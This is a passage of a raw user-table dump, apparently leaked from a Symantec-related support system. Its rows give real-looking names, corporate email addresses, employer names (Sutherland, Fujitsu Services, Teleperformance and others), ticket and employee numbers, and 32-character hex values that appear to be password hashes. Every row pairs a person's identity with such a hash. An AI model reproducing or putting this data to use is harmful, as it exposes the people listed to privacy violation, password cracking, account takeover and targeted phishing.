65b-4846-a129-0f23c9aedd0a,<blank>,<blank>,Vinay_Bathija@SUTH.COM,Sutherland,ac0
a2b20952a6eb6a1f15880ab77489b,Narendra,<blank>,Vinay_Narendra_Bathija,Vinay,NULL
,NULL,NULL
ded-4b8f-8930-b21ac09379c7,<blank>,<blank>,Vinayak_M@SUTH.COM,Sutherland,027ecbe
cf1196ee8988f72dfe924d9a8,M,<blank>,Vinayak_M,Vinayak,NULL,NULL,NULL
a5f-40c8-a3e1-906e39d06c5a,<blank>,<blank>,Vinayak_Adhalrao@SUTH.COM,Sutherland,
ff87f3fbd86d447d1cff56e18907e6df,Vasant,<blank>,Vinayak_Vasant_Adhalrao,Vinayak,
NULL,NULL,NULL
646-4f84-a493-572899fa790a,<blank>,<blank>,Vincent_David2@SUTH.COM,Sutherland,bb
046be238c234d136764a6f0010b21d,Vijaya,<blank>,Vincent_Vijaya_Kumar_David,Vincent
,NULL,NULL,NULL
96de-49da-8050-996860c56daa,CRQ000000204567 - PR - 2/18/2011,<blank>,Karthick_S@
symantec.com,<blank>,9a80070c996acae0d5c0f87226bfb4b9,S,<blank>,113030,Karthick,
NULL,NULL,NULL
7f7-4290-b0ad-2ac05d1b2407,<blank>,<blank>,Vineet_Dokare@SUTH.COM,Sutherland,a72
0ee70bb46f64fafb71cc612c322e9,Subhash,<blank>,Vineet_Subhash_Dokare,Vineet,NULL,
NULL,NULL
99d-4aa5-ab61-98e381f6efd2,<blank>,<blank>,Vineeta_Mohanan@SUTH.COM,Sutherland,4
125a1936234d46c82df1fa353fc8324,Mohanan,<blank>,Vineeta_Mohanan,Vineeta,NULL,NUL
L,NULL
722-4e28-82dc-eabc312b93d0,<blank>,<blank>,Vini_Sukumaran@SUTH.COM,Sutherland,fb
44d6902b253e1bf04ec65000993726,Sukumaran,<blank>,Vini_Sukumaran,Vini,NULL,NULL,N
ULL
d4c-4b35-9759-0234e1a494e1,<blank>,<blank>,Vinit_Korgaonkar@SUTH.COM,Sutherland,
36018f0eddc0aaa9a3d7fe061daa525b,Uday,<blank>,Vinit_Uday_Korgaonkar,Vinit,NULL,N
ULL,NULL
dcf-4e58-b91d-ac0613b76073,<blank>,<blank>,Vinithesika_K1@SUTH.COM,Sutherland,b4
3cab882a58a63d50a92fddffb950c4,K,<blank>,Vinithesika_K,Vinithesika,NULL,NULL,NUL
L
1ba-4d2f-acf1-2d081de65248,BPR-13-01-10,EMPROV/INC87845,accounts@symantec.telepe
rformance.gr,TPG,2589d342cb46596be8dc23a755052658,Yolkina,<blank>,071071,Sviatla
na,NULL,NULL,NULL
3402-4e63-905f-bc3a8410c543,"CRQ000000681093 CLNP Jun 01,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,475cfc63c7ed2ded62ada38cc77e1eef,P,<blank>,226
177,Ramesh,NULL,NULL,NULL
ac7-4f62-af70-4afb9be97f26,<blank>,<blank>,Vinod_Tiwari@SUTH.COM,Sutherland,fcc0
0b2356660a6c2f89fbf6b35569ea,Damodar,<blank>,Vinod_Damodar_Tiwari,Vinod,NULL,NUL
L,NULL
7cf-4b6a-97d8-d3174255d3b3,<blank>,<blank>,Vinod_Chandrasekaran@SUTH.COM,Sutherl
and,a50be0c3f8d436f93c997cfa47fd72ea,Kumar,<blank>,Vinod_Kumar_Chandrasekaran,Vi
nod,NULL,NULL,NULL
38f1-49bd-8650-c3b1f6c0cd1e,CRQ000000379096 SP 31 OCT 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,b79c7c122bedfb065a28a61888acccb1,Injeti,<blank>,121648
,Sunil,NULL,NULL,NULL
5a9-4215-8172-1f12248ef9de,<blank>,<blank>,VinodPrasad_M@SUTH.COM,Sutherland,488
1b26d55bc58db9bb11c656c58f56e,Prasad,<blank>,Vinod_Prasad_M,Vinod,NULL,NULL,NULL
7db-4d21-ac53-86cd21418146,<blank>,<blank>,Vinod_Ramachandran@SUTH.COM,Sutherlan
d,53d2244ff6386a9c3829b948ecc6a49b,Ramachandran,<blank>,Vinod_Ramachandran,Vinod
,NULL,NULL,NULL
fe38-4ebc-b70d-6f1b5bf76eca,CRQ000000206794-VMD-23/11/2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,e73c0a3efc424a9284fcd22eae4d6b0c,A,<blank>,113269,Govi
ndraj,NULL,NULL,NULL
0964-45ac-aed1-cc8e43b4d228,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
592973 - PR - 15th March 2012,23ed83ecba06914d19f72713d043c31f,Rai,<blank>,22265
0,Ashok ,NULL,NULL,NULL
dce-4499-8a27-6bf86c2a6fbe,<blank>,<blank>,Vinoth_D2@SUTH.COM,Sutherland,7dd020a
ff80beb7f1d70723a722c10e3,D,<blank>,Vinoth_D,Vinoth,NULL,NULL,NULL
5422-4d92-b713-af79097985d7,<blank>,<blank>,kevin_evans@symantec.com,Symantec,00
949fbdd005b55aea73fd29f3c62b0e,Evans,<blank>,kevin_evans,Kevin,NULL,NULL,NULL
455-48ae-b273-a155a01d9bd5,<blank>,<blank>,Sirigunya_Wangjinda@symantec.com,Syma
ntec,93975a56274991a535b8db4f0e056848,Wangjinda,<blank>,Sirigunya_Wangjinda,Siri
gunya,NULL,NULL,NULL
ea9c-46fe-953d-fac8ff57dcd3,"CRQ000000682583 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,05a8dd0d0770dcf2f271f656b07c8b92,Bhosale,<bla
nk>,226237,Amit,NULL,NULL,NULL
95f-4e45-82b0-19d4e885b44a,<blank>,<blank>,Rahul_T@SUTH.COM,Sutherland,823601a81
2b63c7af9ae6658f0efdee9,T,<blank>,Rahul_T,Rahul,NULL,NULL,NULL
087-4547-a5c3-971037110987,<blank>,<blank>,Rajarajeswari_V@SUTH.COM,Sutherland,1
554dded3d798261f07f5a9d3c54ee5e,V,<blank>,Rajarajeswari_V,Rajarajeswari,NULL,NUL
L,NULL
413-4d9b-a54d-94aab7d13faa,<blank>,<blank>,bogale.kassaye@nl.fujitsu.com,Fujitsu
Services,cf980c90220d1723ee7867108991f62f,Kassaye,<blank>,Bogale_Kassaye,Bogale
,NULL,NULL,NULL
f6c-4420-a6b6-0de375de9b02,<blank>,<blank>,sonya.lodeto@nl.fujitsu.com,Fujitsu S
ervices,ada870f27372c07cdb2abe6c2f2481b9,Lodeto,<blank>,Sonya_Lodeto,Sonya,NULL,
NULL,NULL
d82-43aa-9c3e-da7a54cb6648,<blank>,<blank>,Pouyan.Salimian@nl.fujitsu.com,Fujits
u Services,d39cce4b7eb2ddb06aae7c61cff2b197,Salimian,<blank>,Pouyan_Salimian,Pou
yan,NULL,NULL,NULL
f99-41e2-8d1e-f0d61772c93a,<blank>,<blank>,marco.checchia@nl.fujitsu.com,Fujitsu
Services,d3622555d4feac41ac4d67ca6f3638ce,Checchia,<blank>,Marco_Checchia,Marco
,NULL,NULL,NULL
7bd-422f-82b5-0fe9e3d83fbc,<blank>,<blank>,Luca.Antonini@nl.fujitsu.com,Fujitsu
Services,a223e4d08636acc97bfc85d5aafab095,Antonini,<blank>,Luca_Antonini,Luca,NU
LL,NULL,NULL
c07-4371-9eae-7e82bfdd0514,<blank>,<blank>,Francesca.longo@nl.fujitsu.com,Fujits
u Services,460a8bfd8b0bad859db0a5dd049c7e32,Longo,<blank>,Francesca_Longo,France
sca,NULL,NULL,NULL
d89-488b-8f39-a628168046dd,<blank>,<blank>,Cristina.lovascio@nl.fujitsu.com,Fuji
tsu Services,9f761537becc32bd7bb48affc3e88e50,Lovascio,<blank>,Cristina_Lovascio
,Cristina,NULL,NULL,NULL
53e-4d17-b1d8-b127feae0c0d,<blank>,<blank>,anna.vacca@nl.fujitsu.com,Fujitsu Ser
vices,8ef1089160857711f1c473a825d9a78f,Vacca,<blank>,Anna_Vacca,Anna,NULL,NULL,N
ULL
221-4b07-8f7a-956b048179b5,<blank>,<blank>,Lars.Hildebrand@nl.fujitsu.com,Fujits
u Services,33efdaedac119521b25412964588490f,Hildebrand,<blank>,Lars_Hildebrand,L
ars,NULL,NULL,NULL
aa6-41a6-a587-064648a0f48e,<blank>,<blank>,david.kreiner@nl.fujitsu.com,Fujitsu
Services,e58ca46472f0d5240c1a629dd99c6ff6,Kreiner,<blank>,David_Kreiner,David,NU
LL,NULL,NULL
c10-4894-881a-49103fb7c3de,<blank>,<blank>,axel.beck@nl.fujitsu.com,Fujitsu Serv
ices,179bd72a7a582bab9f8a26dfdaf49343,Beck,<blank>,Axel_Beck,Axel,NULL,NULL,NULL
a93-4692-9e24-30c65a3f6bf1,<blank>,<blank>,raphael.klingler@nl.fujitsu.com,Fujit
su Services,ffb1588b68a7686be9ae07aaad63ba23,Klingler,<blank>,Raphael_Klingler,R
aphael,NULL,NULL,NULL
cf1-4075-a2f8-c2911d200d70,<blank>,<blank>,yves.toiser@nl.fujitsu.com,Fujitsu Se
rvices,cf34c673db33d994f0f848e8f0f3bec8,Toiser,<blank>,Yves_Toiser,Yves,NULL,NUL
L,NULL
80f-4ab6-a9e1-296a6e5bf0b9,<blank>,<blank>,sidi.aboulila@nl.fujitsu.com,Fujitsu
Services,fe27dbb28b2343082c253b1c9fefe72c,Aboulila,<blank>,Sidi_Aboulila,Sidi,NU
LL,NULL,NULL
93d-463e-8039-98643fa9c8dd,<blank>,<blank>,sebastien.bouin@nl.fujitsu.com,Fujits
u Services,6846be4309bb01f9fe4397566bf9bbd9,Bouin,<blank>,Sebastien_Bouin,Sebast
ien,NULL,NULL,NULL
50a-44a9-ae3a-9642f84e0e10,<blank>,<blank>,patrick.rary@nl.fujitsu.com,Fujitsu S
ervices,b897f1d21c492ffe9e51c4b8a8308d11,Rary,<blank>,Patrick_Rary,Patrick,NULL,
NULL,NULL
7f0-47e3-a7e5-106d776d585b,<blank>,<blank>,Olivier.Loquai@nl.fujitsu.com,Fujitsu
Services,e04156bf89acae734dd05fa1aeeea8ed,Loquai,<blank>,Olivier_Loquai,Olivier
,NULL,NULL,NULL
57c-4589-b6fe-4824ae9b57eb,<blank>,<blank>,norrie.hamidat@nl.fujitsu.com,Fujitsu
Services,bc0103b359ae6bd45ca8fb5ce9c90105,Hamidat,<blank>,Norrie_Hamidat,Norrie
,NULL,NULL,NULL
1ec-4b72-ac75-344ed55fc6f1,<blank>,<blank>,Michel.Gakwisi@nl.fujitsu.com,Fujitsu
Services,37e09c9165969e4a46dcacd7e4b59dbe,Gakwisi,<blank>,Michel_Gakwisi,Michel
,NULL,NULL,NULL
acf-4a41-92c8-8c6bba1671a4,<blank>,<blank>,hoangchuong.le@nl.fujitsu.com,Fujitsu
Services,f541586550ad6a01701f4865bfbc427b,ChuongLe,<blank>,Hoang_ChuongLe,Hoang
,NULL,NULL,NULL
0c5-480b-8d14-cbd83cbf69bf,<blank>,<blank>,gwendal.leblay@nl.fujitsu.com,Fujitsu
Services,5499885653a07ca67df54c49f7ee2801,LeBlay,<blank>,Gwendal_LeBlay,Gwendal
,NULL,NULL,NULL
dc1-4fef-a29b-13edb252630e,<blank>,<blank>,cecile.ratomahenina@nl.fujitsu.com,Fu
jitsu Services,663d5c4fe619f032a2b0cbc1d281006b,Ratomahenina,<blank>,Cecile_Rato
mahenina,Cecile,NULL,NULL,NULL
fc6-435f-86cc-78febcea6807,<blank>,<blank>,bassem.natour@nl.fujitsu.com,Fujitsu
Services,345f367565e526ee055c2b2f82a476d7,Natour,<blank>,Bassem_Natour,Bassem,NU
LL,NULL,NULL
13c-4ff0-8486-b3bb4d9fbd11,<blank>,<blank>,yanick.kadima@nl.fujitsu.com,Fujitsu
Services,3cabc09731a0a1c5a1811d527a3d86ae,Kadima,<blank>,Yanick_Kadima,Yanick,NU
LL,NULL,NULL
9dd-45fb-aca7-ed85eb997f88,<blank>,<blank>,samiha.ben.yahia@nl.fujitsu.com,Fujit
su Services,327ddbd310495efaecca4e21823ce926,BenYahia,<blank>,Samiha_BenYahia,Sa
miha,NULL,NULL,NULL
8d0-4c34-b89c-e0d4c0596ce8,<blank>,<blank>,marie-alice.tavera@nl.fujitsu.com,Fuj
itsu Services,b7b22f2abbeb116244de564819868a69,Tavera,<blank>,Marie Alice_Tavera
,Marie-Alice,NULL,NULL,NULL
c63-4b29-a340-2b6340045a03,<blank>,<blank>,luc.betin@nl.fujitsu.com,Fujitsu Serv
ices,d9cec737b31232a14c4081d040fa9a51,Betin,<blank>,Luc_Betin,Luc,NULL,NULL,NULL
4a3-4798-8ff2-73ff5d7079d7,<blank>,<blank>,julien.maitrele@nl.fujitsu.com,Fujits
u Services,eda1cffdfb928377b9d1c8c426c28d03,LeMaitre,<blank>,Julien_LeMaitre,Jul
ien,NULL,NULL,NULL
baa-4ecf-b7a2-7c964a939dec,<blank>,<blank>,hatice.cice@nl.fujitsu.com,Fujitsu Se
rvices,a72d9039b9f89f05a04d303d1107023c,Cice,<blank>,Hatice_Cice,Hatice,NULL,NUL
L,NULL
8a4-46a0-a85c-423a23801d21,<blank>,<blank>,emma.kebila@nl.fujitsu.com,Fujitsu Se
rvices,8a73229020dfc0df2ae7c58eb593e6e9,Kebila,<blank>,Emma_Kebila,Emma,NULL,NUL
L,NULL
383-493e-b669-e207820f8064,<blank>,<blank>,emilie.blockelet@nl.fujitsu.com,Fujit
su Services,ff6beb2b2d4259aaa4de654c452da727,Blockelet,<blank>,Emilie_Blockelet,
Emilie,NULL,NULL,NULL
26a-4616-99cc-e6aeda660107,<blank>,<blank>,coralie.gillier@nl.fujitsu.com,Fujits
u Services,b169da52c07694b88e4bc6131d7679af,Gillier,<blank>,Coralie_Gillier,Cora
lie,NULL,NULL,NULL
cb6-41e3-adbc-ab39d01938f6,<blank>,<blank>,willemien.coenen@nl.fujitsu.com,Fujit
su Services,a49ac2e93cb97078535818b03f523bb2,Coenen,<blank>,Willemien_Coenen,Wil
lemien,NULL,NULL,NULL
8fc-46d5-a242-1859ac2c811e,<blank>,<blank>,sander.ravenswaaij@nl.fujitsu.com,Fuj
itsu Services,2a74f1691a61e7a9a20fe2250c57014b,van Ravenswaaij,<blank>,Sander_va
n Ravenswaaij,Sander,NULL,NULL,NULL
858-4d6f-aae4-cbb0a596da6c,<blank>,<blank>,RajeshBabuGangula_H@SUTH.COM,Sutherla
nd,9fe2424d63dd3aa6e1aac8ee7e422817,Babu,<blank>,Rajesh_Babu_Gangula_H,Rajesh,NU
LL,NULL,NULL
4e7-41ca-ab0f-cbb74612b918,<blank>,<blank>,jesse.ennin@nl.fujitsu.com,Fujitsu Se
rvices,21ed24a9457adb8c93db16cec5737267,Ennin,<blank>,Jesse_Ennin,Jesse,NULL,NUL
L,NULL
15b-4c5b-bf07-504ff8f0050b,<blank>,<blank>,jeremy.vermeulen@nl.fujitsu.com,Fujit
su Services,88fa7f5dc5591c32d7301cd90026bf23,Vermeulen,<blank>,Jeremy_Vermeulen,
Jeremy,NULL,NULL,NULL
462-4a3b-b4e3-574869200d87,<blank>,<blank>,Rajesh_B2@SUTH.COM,Sutherland,88625d9
4bda59039a20c3d08373e0991,Balasubramaniam,<blank>,Rajesh_Balasubramaniam,Rajesh,
NULL,NULL,NULL
984-423f-905a-06130db8a7a2,<blank>,<blank>,gokhan.yaka@nl.fujitsu.com,Fujitsu Se
rvices,074e09303a69bb3d3c98ee05490e7167,Yaka,<blank>,Gokhan_Yaka,Gokhan,NULL,NUL
L,NULL
691-4fa7-91bc-1a7624c68ed8,<blank>,<blank>,etienne.rosel@nl.fujitsu.com,Fujitsu
Services,b69a5f2707f6fb0e08b371b6a709637d,Rosel,<blank>,Etienne_Rosel,Etienne,NU
LL,NULL,NULL
971-48a6-8ca9-18c2a1a75a84,<blank>,<blank>,brian.beyl@nl.fujitsu.com,Fujitsu Ser
vices,b6d5eb597fef7df69991b349b3df3cd2,Beyl,<blank>,Brian_Beyl,Brian,NULL,NULL,N
ULL
a76-46cf-95fe-8fd4bee6a435,<blank>,<blank>,boysan.patnos@nl.fujitsu.com,Fujitsu
Services,90b6f890fcdb79c332b1fa16aa1c5a9e,Patnos,<blank>,Boysan_Patnos,Boysan,NU
LL,NULL,NULL
e63-4420-bb62-4487cd2cc0bc,<blank>,<blank>,Rajesh_D@SUTH.COM,Sutherland,f8429938
ea6e3da52fbdfd6700cee586,D,<blank>,Rajesh_D,Rajesh,NULL,NULL,NULL
5e2-431b-99de-35bff1272d71,<blank>,<blank>,Bas.Oostveen@nl.fujitsu.com,Fujitsu S
ervices,f802c317d829ecc4862c2f32a33387da,Oostveen,<blank>,Bas_Oostveen,Bas,NULL,
NULL,NULL
f95-4714-997e-f77c56bfb1e2,<blank>,<blank>,rajeshkumar_yadav@suth.com,Sutherland
,48560e0514de287dc2d98b7822f2e99f,Kumar,<blank>,Rajesh_Kumar_Gayaraj_Yadav,Rajes
h,NULL,NULL,NULL
0a8-4d06-90af-dd5f2d32f6ff,<blank>,<blank>,hsoriano@soportec.com.mx,Soportec.com
.mx,ebb132bde0716b1af8cc15a4876d4128,Soriano,<blank>,Hugo_Soriano,Hugo,NULL,NULL
,NULL
061-4d83-945b-2afb5318577d,<blank>,<blank>,dvelasquez@soportec.com.mx,Archived S
oportec,9e51dc12a182d211d3627fd30e3e3404,Velasquez,<blank>,Daniel_Velasquez,Dani
el,NULL,NULL,NULL
755-4692-9835-45503167b41f,<blank>,<blank>,Rajesh_Bhosle@SUTH.COM,Sutherland,63a
1ef078a1c76c5aeb9a2ce987011c4,Madhukar,<blank>,Rajesh_Madhukar_Bhosle,Rajesh,NUL
L,NULL,NULL
cf3-4ecf-83ed-e2931698c5ec,<blank>,<blank>,RajeshGovardhan_OG@SUTH.COM,Sutherlan
d,77679343af6133255c1f893f73a7cf2b,O,<blank>,Rajesh_O_G,Rajesh,NULL,NULL,NULL
172-417c-a85d-689fda30a6ff,<blank>,<blank>,cdgonzales@tparg.com,Archived Teleper
formance Argentina,63c473fbf8f0f95b342dfbb8064ba12b,Gonzalez,<blank>,Carlos_Gonz
alez,Carlos,NULL,NULL,NULL
553-4bfa-966c-9d0a358ba65b,<blank>,<blank>,Rajashankar_SN@SUTH.COM,Sutherland,49
47ee3ccf3a8a47dd225524d0c17556,S,<blank>,Rajashankar_S_N,Rajashankar,NULL,NULL,N
ULL
065-47bb-9d1e-079772426941,<blank>,<blank>,Roland.Kuhn@nl.fujitsu.com,Fujitsu Se
rvices,25a25268e724f29cafef2a5510d7fa5a,Kuhn,<blank>,Roland_Kuhn,Roland,NULL,NUL
L,NULL
589-4943-9bca-45bc6c3d475e,<blank>,<blank>,jeremy.ramsay@nl.fujitsu.com,Fujitsu
Services,167f8fd0b48929e5cc37ec4cdbf64f8b,Ramsay,<blank>,Jeremy_Ramsay,Jeremy,NU
LL,NULL,NULL
747-4b7b-93f3-18476df0f3df,<blank>,<blank>,jeanpierre.chevalier@nl.fujitsu.com,F
ujitsu Services,f4d8fa682a832d8cc169429077cb7256,Chevalier,<blank>,Jean Pierre_C
hevalier,Jean-Pierre,NULL,NULL,NULL
986-43d3-8a55-4bc3e62432e3,<blank>,<blank>,rob.van.senten@nl.fujitsu.com,Fujitsu
Services,012d2e8fb7bae36ed85f6a1e21b0225b,van Senten,<blank>,Rob_van Senten,Rob
,NULL,NULL,NULL
5e2-4f18-89c6-7a11af06c649,<blank>,<blank>,michel.jejanan@nl.fujitsu.com,Fujitsu
Services,0b79155562687c027c80cffce57fe457,Jejanan,<blank>,Michel_Jejanan,Michel
,NULL,NULL,NULL
fca-4075-a8f2-c0eb5d828cd2,<blank>,<blank>,suscripciones@soportec.com.mx,Archive
d Soportec,a61516ae2a5b492aca659385d5316288,Plata,<blank>,David_Plata,David,NULL
,NULL,NULL
d0d-4f20-b61a-340459847475,<blank>,<blank>,chat02@soportec.com.mx,Archived Sopor
tec,b2191fb0a17141eb042dd36a13a2684d,Koellig,<blank>,Francisco_Koellig,Francisco
,NULL,NULL,NULL
ea6-45b5-b0ab-f1a796e55a0f,<blank>,<blank>,atencion_al_cliente2@soportec.com.mx,
Archived Soportec,12ff3a748f31a7a3b19127b88727be92,Jimenez,<blank>,Yanelli_Jimen
ez,Yanelli,NULL,NULL,NULL
67b-4f40-a96e-d03ac04fbc0b,<blank>,<blank>,atencion_al_cliente1@soportec.com.mx,
Archived Soportec,93c759fe3bad083ee97475352f9ef517,Gandara,<blank>,Griselda_Gand
ara,Griselda,NULL,NULL,NULL
ba1-49bb-8ab5-b2465a403ce2,<blank>,<blank>,atencion_al_cliente@soportec.com.mx,S
oportec.com.mx,510d983c1075ccf33c099917cee433c4,Cruz,<blank>,Nadia_Cruz,Nadia,NU
LL,NULL,NULL
14d-4e79-b1ec-7c48984eac4d,<blank>,<blank>,ekrauss@soportec.com.mx,Soportec.com.
mx,7d19064932745c0d4b933646dcd886b8,Krauss,<blank>,Eduardo_Krauss,Eduardo,NULL,N
ULL,NULL
04f-4a14-9b16-605853d7de31,<blank>,<blank>,rajesh_rajan@suth.com,Sutherland,4337
937e0173dc6146dde376309e5ed7,Rajan,<blank>,Rajesh_Rajan,Rajesh,NULL,NULL,NULL
392-4378-b6d2-e8f3ce51e8c5,<blank>,<blank>,Rajiv_Memon@suth.com,Sutherland,dca9d
cd011b4e00ce8e80f8d3f92c6de,Radhakrishnan,<blank>,Rajiv_Radhakrishnan_Menon,Raji
v,NULL,NULL,NULL
041-47a0-bac8-93f608b68444,<blank>,<blank>,sssouza@sercom.com.br,Sercom,697ca9ba
6d0f8774bfcc8c130372b4b3,Souza,<blank>,Sandro Santos_Souza,Sandro Santos,NULL,NU
LL,NULL
32b-409b-b8df-f9581085e480,<blank>,<blank>,Rajeev_S@SUTH.COM,Sutherland,f239248d
19fde73b178766f492887b24,S,<blank>,Rajeev_S,Rajeev,NULL,NULL,NULL
33a-484c-bb53-864d1af53129,<blank>,<blank>,RajeevT_S@SUTH.COM,Sutherland,8582e7a
68259375fe0f84db984920e5c,T,<blank>,Rajeev_T_S,Rajeev,NULL,NULL,NULL
b44-4b72-9414-e3928a176608,<blank>,<blank>,fesantos@tparg.com,Archived Teleperfo
rmance Argentina,78eb78bfef440645374ce8e3b22df0d6,Santos,<blank>,Fernando_Santos
,Fernando,NULL,NULL,NULL
1da-434d-b8f9-17bbcb28358e,<blank>,<blank>,mtesauro@tparg.com,Archived Teleperfo
rmance Argentina,735af60625984bfe336c82562ead4321,Tesauro,<blank>,Marcelo_Tesaur
o,Marcelo,NULL,NULL,NULL
c42-4d67-85d1-283a0ecb2ca1,<blank>,<blank>,mtorrecillas@teleperformance.com.ar,A
rchived Teleperformance Argentina,5fbb40c9337af250c5eadc1edb698977,Torrecillas,<
blank>,Matias_Torrecillas,Matias,NULL,NULL,NULL
9da-49e5-81ee-8e04e033ca34,<blank>,<blank>,squevedo@teleperformance.com.ar,Archi
ved Teleperformance Argentina,cffc4bcab0d710d80cda5e65f7dd2a0c,Quevedo,<blank>,S
ilvia_Quevedo,Silvia,NULL,NULL,NULL
bca-466d-8421-89778586657b,<blank>,<blank>,jay_glass@symantec.com,Symantec,5436d
a356b6b6b54aabfd60196bc4239,Glass,<blank>,091277,Jay ,NULL,NULL,NULL
fca-4547-a5fa-a76355f99d3f,<blank>,<blank>,Rajneesh_Deka@SUTH.COM,Sutherland,30a
20fdf4bb9588a44f2445a8f1271da,Deka,<blank>,Rajneesh_Deka,Rajneesh,NULL,NULL,NULL
214-4fd6-a925-2d606dd9c8ff,<blank>,<blank>,Rakesh_B@SUTH.COM,Sutherland,290d5a51
0221e86a289aef30a3ec412d,B,<blank>,Rakesh_B,Rakesh,NULL,NULL,NULL
38a-4b96-ab61-da87147d8697,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,046d6e30bddf485f64ea06383500e21a,Bechar,<blank>,Rakesh_Bechar_Khuman,Rakesh,NUL
L,NULL,NULL
4cb-4ee0-b326-119498aa0019,<blank>,<blank>,Rakesh_GS1@SUTH.COM,Sutherland,63b724
41c9d7f8ad2944feed9b7a47bb,G,<blank>,Rakesh_G_S,Rakesh,NULL,NULL,NULL
ed9-4a60-bfe3-b558ef0917f1,<blank>,<blank>,Mie_Kato1@symantec.com,Symantec,9139f
c90507dcf28c9ed0fa15f2a798f,Kato,<blank>,Mie_Kato,Mie,NULL,NULL,NULL
152-4aca-ac2e-ece089066328,<blank>,<blank>,symaccount@clts.com,CLTS,e498893ea89d
e88dc4b2e33201c5aafe,Sun,<blank>,Zeqing_Sun,Zeqing,NULL,NULL,NULL
08c-48c0-843e-2bb4d794f7ae,<blank>,101554,Tools_id@symantec.suth.com,Sutherland
,a0894e5f23823556e4e64af29035958e,Knaifati,<blank>,karen_knaifati,Karen,NULL,NUL
L,NULL
c6c-4122-8a32-3e66408ebbf0,<blank>,<blank>,Rakesh_Ramachandran@SUTH.COM,Sutherla
nd,dc7c88ee48c416324be8567f4f6b7b6a,Ramachandran,<blank>,Rakesh_Ramachandran,Rak
esh,NULL,NULL,NULL
ee1-40b9-82c2-c9f9237e8ce9,<blank>,<blank>,eddie.ss-wong@clts.com,CLTS,d790bc4e3
eac5b297a90ce9389cae8b8,Wong,<blank>,Eddie_Wong,Eddie,NULL,NULL,NULL
14d-48b5-8ad4-f7aaec3b4b90,<blank>,<blank>,saffet.sevik@nl.fujitsu.com,Fujitsu S
ervices,5fe9152f745e25d418ccad9d4bc1ebf3,Sevik,<blank>,Saffet_Sevik,Saffet,NULL,
NULL,NULL
f87-47f8-aea6-d683a8fc7935,<blank>,<blank>,Arne.Klarenberg@nl.fujitsu.com,Fujits
u Services,58f4f4d6db22fc64809a28df05588e88,Klarenberg,<blank>,Arne_Klarenberg,A
rne,NULL,NULL,NULL
a36-4859-ba81-02c533c2a299,<blank>,<blank>,peter.mallinckrodt@nl.fujitsu.com,Fuj
itsu Services,1f5dd27abe5207e37ba1230e85dac429,Mallinckrodt,<blank>,Peter_Mallin
ckrodt,Peter,NULL,NULL,NULL
b3d-4904-8515-d15fe69b1402,<blank>,<blank>,miruella.ascension@nl.fujitsu.com,Fuj
itsu Services,b0ff9db66c116168f5991a4bf3a80b74,Ascension,<blank>,Miruella_Ascens
ion,Miruella,NULL,NULL,NULL
29e-4a83-80a2-05c1b7a0fb6f,<blank>,<blank>,marco.hanegraaf@nl.fujitsu.com,Fujits
u Services,e4f391200d3e160a85f3b2dc1d9982ec,Hanegraaf,<blank>,Marco_Hanegraaf,Ma
rco,NULL,NULL,NULL
51d-4429-ab5c-ed6c12eb1414,<blank>,<blank>,dominique.supusepa@nl.fujitsu.com,Fuj
itsu Services,ea88d0b88304ae4b53bed75736d4b2b5,Supusepa,<blank>,Dominique_Supuse
pa,Dominique,NULL,NULL,NULL
576-43d8-bfad-9b3dc22341c2,<blank>,<blank>,christine.seidl@nl.fujitsu.com,Fujits
u Services,f23630b3a4de6b26a4d31f7e88e02b79,Seidl,<blank>,Christine_Seidl,Christ
ine,NULL,NULL,NULL
bd4-4c48-ae6e-ac3eb7fc978e,<blank>,<blank>,carlos.michielen@nl.fujitsu.com,Fujit
su Services,ba81d4d271d617fbe1ddf10429278c9a,Michielen,<blank>,Carlos_Michielen,
Carlos,NULL,NULL,NULL
678-48be-b9c9-8403e4806d67,<blank>,<blank>,RajeshKannan_M@SUTH.COM,Sutherland,09
1d7b7f83791d5439d004c4f318f2bf,Kannan,<blank>,Rajesh_Kannan_M,Rajesh,NULL,NULL,N
ULL
14d-4a34-98c6-ac6659cb9f92,<blank>,<blank>,bgiorgi@tparg.com,Archived Teleperfor
mance Argentina,0f13be7e731e689dfce7ddff4154c579,Giorgi,<blank>,Bernardo_Giorgi,
Bernardo,NULL,NULL,NULL
36e-4a5d-a228-a96708e99a63,<blank>,<blank>,maalegre@tparg.com,Archived Teleperfo
rmance Argentina,4e35b265d047c635cd71b7bda82195e0,Boroni,<blank>,Maximiliano_Bor
oni,Maximiliano,NULL,NULL,NULL
70e-4c7d-aa4f-edb6e5f9e09b,<blank>,<blank>,scester@tparg.com,Archived Teleperfor
mance Argentina,34b4421b92f9948ea24b7c339979c56e,Cester,<blank>,Sebastian_Cester
,Sebastian,NULL,NULL,NULL
af6-494f-af53-0a629fa89283,bpr-17-03-10,INC129945,claudia_aguiar@symantec.com,Sy
mantec,382f97654056207c867315afcaf6d54d,Aguiar,<blank>,Claudia_Aguiar,Claudia,NU
LL,NULL,NULL
042-437d-90ba-1ded90cf8735,<blank>,<blank>,lisania_bento@symantec.com,Symantec,7
8a11d7fbb8b810dc3cc6e3d8997718b,Bento,<blank>,Lisania_Bento,Lisania,NULL,NULL,NU
LL
793-4a1e-a3c8-998ca3db444a,<blank>,<blank>,angela.vonk@nl.twenty4help.com,Telepe
rformance Holland,16bae165573b601a0c44b45f069c9a7f,Vonk,<blank>,Angela_Vonk,Ange
la,NULL,NULL,NULL
5d6-4682-be42-06aa47092349,<blank>,080365,SSSOUZA@sercom.com.br,Sercom,4b8e3aba6
40813fb0b6a7c15996f58e0,Souza,<blank>,sandro_souza,Sandro,NULL,NULL,NULL
a67-4f47-a1da-1229d8b3e8ab,<blank>,<blank>,aortona@sercom.com.br,Sercom,af634713
73901f336a4ad4f91172a4fc,Ortona,<blank>,Irving Allan_Ortona,Irving Allan,NULL,NU
LL,NULL
547-432a-87c2-1e109c1c9c1c,<blank>,068037,rmanzo@soportec.com.mx,Soportec.com.mx
,c6b615c5b7ee4a8241ba5133ce1cad64,Velazquez,<blank>,daniel_velazquez,Daniel\t\t,
NULL,NULL,NULL
bae-4c82-a2ed-c561779d5bed,<blank>,<blank>,cedsantos@sercom.com.br,Sercom,eabe59
f50a742107bdf98c8c775ad1da,Santos,<blank>,Carlos Eduardo_Santos,Carlos Eduardo,N
ULL,NULL,NULL
150-4b45-9c22-1783a75f1668,<blank>,071072,amoras@symantec.teleperformance.gr,TPG
